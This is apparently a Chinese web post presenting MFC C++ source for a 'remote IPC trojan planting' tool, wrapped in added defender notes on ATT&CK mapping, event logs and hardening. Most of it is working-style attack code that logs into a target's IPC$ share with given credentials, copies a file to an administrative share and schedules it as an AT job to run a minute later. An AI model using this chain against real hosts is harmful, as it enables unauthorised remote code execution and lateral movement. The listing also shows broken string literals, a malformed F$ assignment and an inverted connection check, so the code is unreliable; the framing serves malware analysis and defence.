远程IPC种植木马


实现代码如下:

// Analysis notes (reviewer-added, for malware analysts and defenders).
//
// This listing is kept as an analysis sample. It shows a classic Windows
// lateral-movement chain built only from documented Win32 / LAN Manager APIs:
//   1. authenticate to the target's IPC$ share with supplied credentials
//      (WNetAddConnection2),
//   2. copy a local file to an administrative share (admin$, then C$..F$),
//   3. read the target's clock (NetRemoteTOD),
//   4. register a legacy AT job for the copied file (NetScheduleJobAdd).
// This corresponds to MITRE ATT&CK T1021.002 (SMB/Windows Admin Shares) and
// T1053.002 (Scheduled Task/Job: At).
//
// Telemetry this chain typically leaves on the target:
//   - a network logon (Security event 4624, logon type 3) for the account used,
//   - administrative-share access (Security events 5140/5145 when file-share
//     auditing is enabled),
//   - a new AT job (typically a scheduled-task creation event such as 4698
//     when object-access auditing is enabled, and an At<N>.job file in the
//     legacy Tasks directory).
// Hardening that breaks the chain: unique local administrator passwords,
// no shared admin credentials across hosts, blocking workstation-to-workstation
// SMB (TCP 445), and remote restrictions on local accounts. Microsoft documents
// NetScheduleJobAdd as unavailable from Windows 8 onwards.
//
// The code is reproduced as published. String literals appear to have lost
// backslashes during web extraction; they are intentionally left untouched.

// Parameter bundle handed from the dialog to the worker thread.
typedef struct TagHost
{
    CString host;           // target host name or address, used to build the UNC paths
    CString user;           // account name passed to WNetAddConnection2
    CString pass;           // password passed to WNetAddConnection2 (held in clear text)
    CString filename;       // file name appended to the remote share path
    CString LocalFilePath;  // local source path given to CopyFile
    CListBox* list;         // list box that receives the status lines
}IPC;

// Dialog handler: snapshots the dialog fields into a heap-allocated IPC
// structure and starts ThreadIpcConnect with it.
// `filename` is not declared in this listing; presumably a member or global.
// The IPC object is allocated with new; no matching delete is visible here.
void CShareDlg::OnStart() // (author) start the worker thread
{
    UpdateData(TRUE);
    IPC* ipc = new IPC;
    ipc->host = m_host;
    ipc->user = m_user;
    ipc->pass = m_pass;
    ipc->LocalFilePath = m_localfile;
    ipc->filename = filename;
    // Pointer to a UI control is shared with the worker thread.
    ipc->list = &m_list;
    AfxBeginThread(ThreadIpcConnect,ipc);
}

// ---- worker thread ----
// Runs the connect / copy / query-time / schedule sequence against one host
// and reports each outcome by appending a line to the list box.
// lpvoid: pointer to the IPC structure built in CShareDlg::OnStart.
// Always returns TRUE, whatever the outcome of the individual steps.
UINT ThreadIpcConnect(LPVOID lpvoid)
{
    IPC* ipc;
    CListBox* list;
    ipc = (IPC*)lpvoid;
    CString host;
    CString admin;
    CString pass;
    CString filename;
    CString localfilepath;
    // Copy every field out of the parameter block into locals.
    host = ipc->host ;
    pass = ipc->pass;
    admin = ipc->user;
    localfilepath = ipc->LocalFilePath;
    filename =ipc->filename ;
    list = ipc->list;
    BOOL IpcConnect;
    LPTIME_OF_DAY_INFO TimeBuf=NULL;
    NET_API_STATUS Status;
    // CmdCom holds the command string that is later placed in AT_INFO.Command;
    // it is reassigned whenever a fallback share is tried.
    CString RemoteFilePath,CmdCom("admin$\");
    // ---- IPC connection ----
    NETRESOURCE ns;
    TCHAR buf[MAX_PATH];
    // Builds the remote IPC$ resource name from the host string.
    wsprintf(buf,"\\%s\ipc$",host);
    ZeroMemory(&ns,sizeof(ns));
    ns.dwScope=RESOURCE_GLOBALNET;
    ns.dwType=RESOURCETYPE_ANY;
    ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;
    ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
    // Empty local name: no drive letter is mapped for the connection.
    ns.lpLocalName="";
    ns.lpRemoteName=buf;
    ns.lpProvider=NULL;
    ns.lpComment=NULL;
    CString hhost = host;
    // (author) establish the IPC connection with the supplied credentials.
    // Defender view: this is the authentication step that shows up as a
    // network logon on the target.
    IpcConnect =WNetAddConnection2(&ns,pass,admin,0);
    if(IpcConnect)
    { // (author) branch intended for the connected case
        // ---- upload the file ----
        RemoteFilePath=("\\"+host+"\admin$\"+filename);
        // (author) copy the file to admin$ (winnt); if that fails, try the
        // other administrative shares in turn.
        IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
        if(!IpcConnect)
        {
            // Fallback 1: C$ share; CmdCom is set to the matching C: path.
            RemoteFilePath=("\\"+host+"\C$\"+filename);
            CmdCom="C:\"+filename;
            IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
            if(!IpcConnect)
            {
                // Fallback 2: D$ share.
                RemoteFilePath=("\\"+host+"\D$\"+filename);
                CmdCom="D:\"+filename;
                IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
                if(!IpcConnect)
                {
                    // Fallback 3: E$ share.
                    RemoteFilePath=("\\"+host+"\E$\"+filename);
                    CmdCom="E:\"+filename;
                    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
                    if(!IpcConnect)
                    {
                        // Fallback 4: F$ share (statement reproduced as published).
                        RemoteFilePath ("\\"+host+"\F$\"+filename);
                        CmdCom = "F:\"+filename;
                        IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);
                    }
                }
            }
        }
        // ---- query the remote host's time ----
        if(IpcConnect)
        { // (author) get the remote host's time
            Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);
            if(Status==NERR_Success)
            { // (author) time retrieved successfully
                // ---- schedule the copied file ----
                DWORD day=1,JobTime;
                AT_INFO ai;
                // day becomes 2 and is stored in DaysOfMonth below.
                day=day*2;
                ai.Command=CmdCom.AllocSysString();
                ai.DaysOfMonth=day;
                ai.DaysOfWeek=0;
                ai.Flags=JOB_NONINTERACTIVE;
                // Milliseconds since midnight: the remote hour adjusted by the
                // reported timezone offset, plus the remote minute + 1.
                ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;
                // Defender view: this call registers an AT job on the target;
                // unexpected AT jobs are a strong indicator of compromise.
                Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);
                // (author) run the uploaded file, starting one minute later
                if(Status==NERR_Success)
                {
                    list->AddString(host+"启动成功");
                }
                else
                    list->AddString(host+"启动失败");
            }
            else
            {
                list->AddString(host+"获取时间失败");
            }
        }
        else
        {
            list->AddString(host+"复制文件失败");
        }
    }
    else
        list->AddString(host+"连接失败");
    return TRUE;
}


以上代码来自互联网,仅作备份,供分析木马病毒时参考。
